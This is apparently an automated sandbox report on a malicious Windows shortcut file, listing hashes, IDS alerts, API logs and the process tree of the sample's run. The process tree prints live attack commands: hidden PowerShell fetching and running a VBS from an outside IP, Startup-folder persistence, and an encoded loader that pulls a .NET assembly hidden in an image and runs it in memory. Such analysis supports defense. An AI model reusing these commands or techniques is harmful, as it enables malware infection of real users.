Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 9, 2023, 9:41 p.m.	Sept. 9, 2023, 9:43 p.m.

Size	1.8KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=13, Archive, ctime=Sat May 20 19:50:25 2023, mtime=Thu Sep 7 07:11:19 2023, atime=Sat May 20 19:50:25 2023, length=461824, window=hidenormalshowminimized
MD5	`e67fd436c857cd3c1ec0c9fd287d4b5f`
SHA256	`e6769ee560ac9eedfe733cad900a2686dcff76752e789341949f18741dd7ac80`
CRC32	`2CBD205E`
ssdeep	`24:8nGs1u1ISAm+tKMsWwUCuoUW7r+/CWl+/CWy+/CWLKs0Pnm1+eUMkWk+wYqVZ1Cr:8NuFAfJOIfdlm1PHM/B7QdNQ`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Antivirus - Contains references to security software Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "IALlcyCOe" C:\Users\test22\AppData\Local\Temp\IGCCU.lnk
2560
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden curl http://141.98.6.202/windows/wind/IE_Cache.vbs -o C:\Windows\Temp\Debug.vbs ;Start-Process C:\Windows\Temp\Debug.vbs
  2672
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden curl http://141.98.6.202/windows/wind/IE_Cache.vbs -o C:\Windows\Temp\Debug.vbs
    2808
    - curl.exe "C:\util\curl\curl.exe" http://141.98.6.202/windows/wind/IE_Cache.vbs -o C:\Windows\Temp\Debug.vbs
      2884
  - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Windows\Temp\Debug.vbs"
    2956
    - cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Windows\Temp\Debug.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ reUAofclWUÇ.vbs')"
      3036
      - PING.EXE ping 127.0.0.1 -n 5
        2076
      - cmd.exe cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Windows\Temp\Debug.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ reUAofclWUÇ.vbs')"
        1336
        
        powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\Temp\Debug.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ reUAofclWUÇ.vbs')
        320
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA1ADkANwAvADIAMwA2AC8AbwByAGkAZwBpAG4AYQBsAC8AcgB1AG0AcABfAHAAcgBpAHYAYQBkAGEALgBqAHAAZwA/ADEANgA5ADMAOAA0ADcAMAA3ADAAJwA7ACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGkAbQBhAGcAZQBVAHIAbAApADsAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJAB0AHkAcABlACAAPQAgACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcARgBpAGIAZQByAC4ASABvAG0AZQAnACkAOwAkAG0AZQB0AGgAbwBkACAAPQAgACQAdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkAOwAkAGEAcgBnAHUAbQBlAG4AdABzACAAPQAgACwAKAAnAHQAeAB0AC4AZABhAHAAZABlAHQAbwBOAC8AcwB3AG8AZABuAGkAdwAvADIAMAAyAC4ANgAuADgAOQAuADEANAAxAC8ALwA6AHAAdAB0AGgAJwApADsAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAGEAcgBnAHUAbQBlAG4AdABzACkA'";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64String( $codigo))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
      2324
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/597/236/original/rump_privada.jpg?1693847070';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.dapdetoN/swodniw/202.6.89.141//:ptth');$method.Invoke($null, $arguments)"
        2552

Name	Response	Post-Analysis Lookup
apps.identrust.com	A 121.254.136.9 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 121.254.136.18	23.67.53.17
uploaddeimagens.com.br	A 104.21.45.138 A 172.67.215.45	104.21.45.138

IP Address	Status	Action
104.21.45.138	Active	Moloch
121.254.136.9	Active	Moloch
141.98.6.202	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49177 -> 104.21.45.138:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49167 -> 141.98.6.202:80	2027260	ET INFO Dotted Quad Host VBS Request	Potentially Bad Traffic
TCP 192.168.56.101:49167 -> 141.98.6.202:80	2013028	ET POLICY curl User-Agent Outbound	Attempted Information Leak
TCP 192.168.56.101:49167 -> 141.98.6.202:80	2034567	ET HUNTING curl User-Agent to Dotted Quad	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49177 104.21.45.138:443	C=US, O=Let's Encrypt, CN=E1	CN=uploaddeimagens.com.br	67:68:c4:e4:aa:54:e1:fd:f0:50:01:73:1e:da:cf:48:0c:17:0d:34

Queries for the computername (33 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (5 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 9, 2023, 9:41 p.m.			0	0
IsDebuggerPresent Sept. 9, 2023, 9:41 p.m.			0	0
IsDebuggerPresent Sept. 9, 2023, 9:41 p.m.			0	0
IsDebuggerPresent Sept. 9, 2023, 9:41 p.m.			0	0
IsDebuggerPresent Sept. 9, 2023, 9:41 p.m.			0	0

Command line console output was observed (50 out of 181 events)

Time & API	Arguments	Status	Return
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: Pinging 127.0.0.1 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: with 32 bytes of data: console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: Ping statistics for 127.0.0.1: Packets: Sent = 5, Received = 5, Lost = 0 (0% loss), console_handle: 0x00000007	1	1
WriteConsoleA Sept. 9, 2023, 9:41 p.m.	buffer: Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms console_handle: 0x00000007	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti console_handle: 0x00000023	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: on was closed: Could not establish trust relationship for the SSL/TLS secure ch console_handle: 0x0000002f	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: annel." console_handle: 0x0000003b	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: At line:1 char:184 console_handle: 0x00000047	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/597/236/original/rump_ console_handle: 0x00000053	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: privada.jpg?1693847070';$webClient = New-Object System.Net.WebClient;$imageByte console_handle: 0x0000005f	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: s = $webClient.DownloadData <<<< ($imageUrl);$imageText = [System.Text.Encoding console_handle: 0x0000006b	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: ]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BA console_handle: 0x00000077	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: SE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText console_handle: 0x00000083	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: .IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex console_handle: 0x0000008f	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = console_handle: 0x0000009b	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Conver console_handle: 0x000000a7	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: t]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assem console_handle: 0x000000b3	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: bly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method console_handle: 0x000000bf	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: = $type.GetMethod('VAI');$arguments = ,('txt.dapdetoN/swodniw/202.6.89.141//:p console_handle: 0x000000cb	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: tth');$method.Invoke($null, $arguments) console_handle: 0x000000d7	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000e3	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000000ef	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null. console_handle: 0x0000010f	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: Parameter name: bytes" console_handle: 0x0000011b	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: At line:1 char:247 console_handle: 0x00000127	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/597/236/original/rump_ console_handle: 0x00000133	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: privada.jpg?1693847070';$webClient = New-Object System.Net.WebClient;$imageByte console_handle: 0x0000013f	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: s = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF console_handle: 0x0000014b	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: 8.GetString <<<< ($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BA console_handle: 0x00000157	1	1
WriteConsoleW Sept. 9, 2023, 9:41 p.m.	buffer: SE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText console_handle: 0x00000163	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 206 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b5f70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b6370 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b6370 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b6370 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b6370 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b6370 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b6370 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b6530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b6530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b6530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b6970 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b66b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b6070 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b6070 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038cc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038d458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038d458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038d458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038d618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038d618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038d618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038d618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038d618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2023, 9:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038d618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

